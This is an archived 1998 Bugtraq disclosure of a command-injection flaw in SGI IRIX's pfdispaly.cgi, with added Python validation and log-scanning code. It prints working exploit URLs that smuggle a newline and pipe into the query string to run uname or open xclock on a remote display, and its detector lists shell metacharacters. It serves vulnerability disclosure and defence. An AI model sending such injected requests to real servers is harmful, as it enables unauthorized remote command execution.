Yet another SGI pfdispaly CGI hole
Description: As has been demonstrated many times, SGI CANNOT write secure CGI scripts. Nor can they write secure setuid programs. They fixed the last pfdisplay.cgi hole, but the new version is still quite buggy -- as this post demonstrates.
Author: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
Compromise: run arbitrary commands remotely as the UID running the webserver
Vulnerable Systems: SGI IRIX 6.2 using the performer_tools CGIs.
Date: 7 April 1998
Notes: I honestly believe default SGI security is as bad as default Windows NT security. That is sad.
Date: Tue, 7 Apr 1998 03:16:01 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: performer_tools again
Hi
There is already a patch from SGI for the pfdispaly.cgi
'../..' bug.
But it seems it fixes only that problem, without checking
the rest of the code for similar vulnerabilities, so even
after patch 3018 (04/01/98) you can try:
$ lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
uname -a\| file
IRIX victim 6.2 03131015 IP22
or
$ lynx -dump \
http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'
(You probably will notice this exploit is similar to that
one on 'wrap'; it's nice to find that sometimes reusing
code does work)
The fix is easy (for this particular problem); so it's left
to the reader.
Anyway, if you're using SGI CGIs you should consider
limiting access to your domain...
--
J.A. Gutierrez So be easy and free
when you're drinking with me
I'm a man you don't meet every day
finger me for PGP (the pogues)
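The post leaves the fix to the reader. The following Python is an added example, not code from the original post and not SGI's patch, showing the two defensive checks the advisory implies: a strict allowlist on the CGI's single query-string parameter (rejecting the newline, pipe and path separators the request above relies on, plus the '../..' pattern fixed by patch 3018), and a scan of access-log lines for the same characters so such requests can be spotted after the fact. BASE_DIR, the file name demo.pfb and the log lines are constructed assumptions.

```python
import os
import re
from urllib.parse import unquote

# Assumed directory the CGI may serve files from (hypothetical; not SGI's layout).
BASE_DIR = "/var/www/performer_tools"

# Allowlist for the one parameter: a plain file name. No '/', no '|', no
# whitespace and no newline, so a percent-encoded %0A or %7C cannot survive.
_NAME_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")

# Characters and patterns that should never appear in a decoded query string
# destined for a shell or a pipe-open: newline, pipe, ';', backtick, '$', '&',
# and the traversal sequence from the earlier bug.
_SUSPICIOUS = re.compile(r"[\r\n|;`$&]|\.\./")


def validate_query(raw_query: str):
    """Percent-decode the query string and return it if it is a safe file
    name, otherwise None. Decoding happens first so that %0A, %7C and
    %2E%2E are judged in the form the script would actually use."""
    name = unquote(raw_query)
    if not _NAME_RE.fullmatch(name):
        return None
    if ".." in name:  # belt and braces against the original traversal bug
        return None
    return name


def resolve_path(raw_query: str, base_dir: str = BASE_DIR):
    """Map a validated parameter to an absolute path and confirm the result
    still lies under base_dir. Returns None on any rejection."""
    name = validate_query(raw_query)
    if name is None:
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def flag_log_line(line: str) -> bool:
    """True if a Common Log Format line carries a request whose decoded
    query string contains shell metacharacters or traversal."""
    m = re.search(r'"(?:GET|POST) (\S+)', line)
    if not m:
        return False
    url = m.group(1)
    if "?" not in url:
        return False
    query = unquote(url.split("?", 1)[1])
    return bool(_SUSPICIOUS.search(query))


def scan_log(lines):
    """Return the indices of log lines that flag_log_line() considers suspicious."""
    return [i for i, line in enumerate(lines) if flag_log_line(line)]


# Constructed sample access-log lines (not real traffic): one benign request,
# one with the newline-and-pipe payload from the post, one with '../..'.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Apr/1998:03:16:01 +0200] "GET /cgi-bin/pfdispaly.cgi?demo.pfb HTTP/1.0" 200 512',
    '10.0.0.9 - - [07/Apr/1998:03:17:44 +0200] "GET /cgi-bin/pfdispaly.cgi?%0A/bin/uname%20-a| HTTP/1.0" 200 98',
    '10.0.0.9 - - [07/Apr/1998:03:18:10 +0200] "GET /cgi-bin/pfdispaly.cgi?../../etc/passwd HTTP/1.0" 403 0',
]

if __name__ == "__main__":
    for q in ("demo.pfb", "%0A/bin/uname%20-a|", "../.."):
        print(repr(q), "->", validate_query(q))
    print("suspicious log lines:", scan_log(SAMPLE_LOG))
```

The allowlist is the real fix: the script should never hand a user-controlled string to a shell or to a pipe-open, and a name that matches the pattern cannot carry a command. The log scan is only a detective control, useful for checking whether a server was probed with this request before the script was replaced.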
This page is part of Fyodor's exploit world.